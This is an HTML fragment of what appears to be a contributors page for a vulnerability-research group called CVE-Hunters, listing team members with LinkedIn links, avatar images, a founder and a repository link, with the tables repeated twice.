style="text-align: center;"> <a href="https://www.linkedin.com/in/f%C3%AAmartins/"> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/"> <img src="/assets/contributors/isadora.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/itauan"> <img src="/assets/contributors/itauan.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/f%C3%AAmartins/">Fernanda<br>Martins</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/">Isadora<br>Novaes</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/itauan">Itauan<br>Santos</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/karina-gante/"> <img src="/assets/contributors/karina.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/marceloqueirozjr"> <img src="/assets/contributors/marcelo.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/marcos-tolosa/"> <img src="/assets/contributors/marcos.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/karina-gante/">Karina<br>Gante</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/marceloqueirozjr">Marcelo<br>Queiroz</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/marcos-tolosa/">Marcos<br>Tolosa</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app"> <img src="/assets/contributors/pedro.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/rafael-corvino/"> <img src="/assets/contributors/rafael.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/"> <img src="/assets/contributors/raul.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app">Pedro<br>Lyrio</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/rafael-corvino/">Rafael<br>Corvino</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/">Raul<br>Pazemécxas</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app"> <img src="/assets/contributors/samara.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira"> <img src="/assets/contributors/taiza.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://br.linkedin.com/in/thiagoescarrone"> <img src="/assets/contributors/thiago.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app">Samara<br>Gama</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira">Taíza<br>Oliveira</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://br.linkedin.com/in/thiagoescarrone">Thiago<br>Escarrone</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vanderlei-princival/"> <img src="/assets/contributors/vanderlei.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/vinicius-gross-castro"> <img src="/assets/contributors/viniciusCastro.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/"> <img src="/assets/contributors/vinicius.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vanderlei-princival/">Vanderlei<br>Princival</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/vinicius-gross-castro">Vinicius<br>Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/">Vinícius<br>Melfi</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/yago-dyogennes/"> <img src="/assets/contributors/yago.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/yago-dyogennes/">Yago<br>Dyogennes</a></td> </tr> </tbody> </table> <h2 id="repository">Repository </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/CVE-Hunters/cve-hunters"> <img src="/team/cve-hunters-logo.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://github.com/CVE-Hunters/cve-hunters">Official <br> Repository</a></td> </tr> </tbody> </table><p>You can find useful repositories and contributors links below:</p> <h2 id="founder">Founder </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/nmmorette/"> <img src="/assets/contributors/natan.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/nmmorette/">Natan Maia<br /> Morette</a></td> </tr> </tbody> </table> <h2 id="contributors">Contributors </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/angelo-morette-019/"> <img src="/assets/contributors/angelo.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/diegocbcastro/"> <img src="/assets/contributors/diego.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/elisangelasilvademendonca/"> <img src="/assets/contributors/elisangela.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/angelo-morette-019/">Angelo<br />Morette</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/diegocbcastro/">Diego<br />Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/elisangelasilvademendonca/">Elisângela<br />Mendonça</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/f%C3%AAmartins/"> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/"> <img src="/assets/contributors/isadora.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/itauan"> <img src="/assets/contributors/itauan.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/f%C3%AAmartins/">Fernanda<br />Martins</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/isadora-cristina-a0580014b/">Isadora<br />Novaes</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/itauan">Itauan<br />Santos</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/karina-gante/"> <img src="/assets/contributors/karina.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/marceloqueirozjr"> <img src="/assets/contributors/marcelo.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/marcos-tolosa/"> <img src="/assets/contributors/marcos.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/karina-gante/">Karina<br />Gante</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/marceloqueirozjr">Marcelo<br />Queiroz</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/marcos-tolosa/">Marcos<br />Tolosa</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app"> <img src="/assets/contributors/pedro.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/rafael-corvino/"> <img src="/assets/contributors/rafael.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/"> <img src="/assets/contributors/raul.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app">Pedro<br />Lyrio</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/rafael-corvino/">Rafael<br />Corvino</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/">Raul<br />Pazemécxas</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app"> <img src="/assets/contributors/samara.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira"> <img src="/assets/contributors/taiza.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://br.linkedin.com/in/thiagoescarrone"> <img src="/assets/contributors/thiago.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/samaragama?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=ios_app">Samara<br />Gama</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/ta%C3%ADza-oliveira">Taíza<br />Oliveira</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://br.linkedin.com/in/thiagoescarrone">Thiago<br />Escarrone</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vanderlei-princival/"> <img src="/assets/contributors/vanderlei.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="http://www.linkedin.com/in/vinicius-gross-castro"> <img src="/assets/contributors/viniciusCastro.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/"> <img src="/assets/contributors/vinicius.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vanderlei-princival/">Vanderlei<br />Princival</a></td> <td style="text-align: center; font-weight: bold;"><a href="http://www.linkedin.com/in/vinicius-gross-castro">Vinicius<br />Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/vinicius-marim-melfi-4b937b155/">Vinícius<br />Melfi</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/yago-dyogennes/"> <img src="/assets/contributors/yago.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/yago-dyogennes/">Yago<br />Dyogennes</a></td> </tr> </tbody> </table> <h2 id="repository">Repository </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/CVE-Hunters/cve-hunters"> <img src="/team/cve-hunters-logo.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://github.com/CVE-Hunters/cve-hunters">Official <br /> Repository</a></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000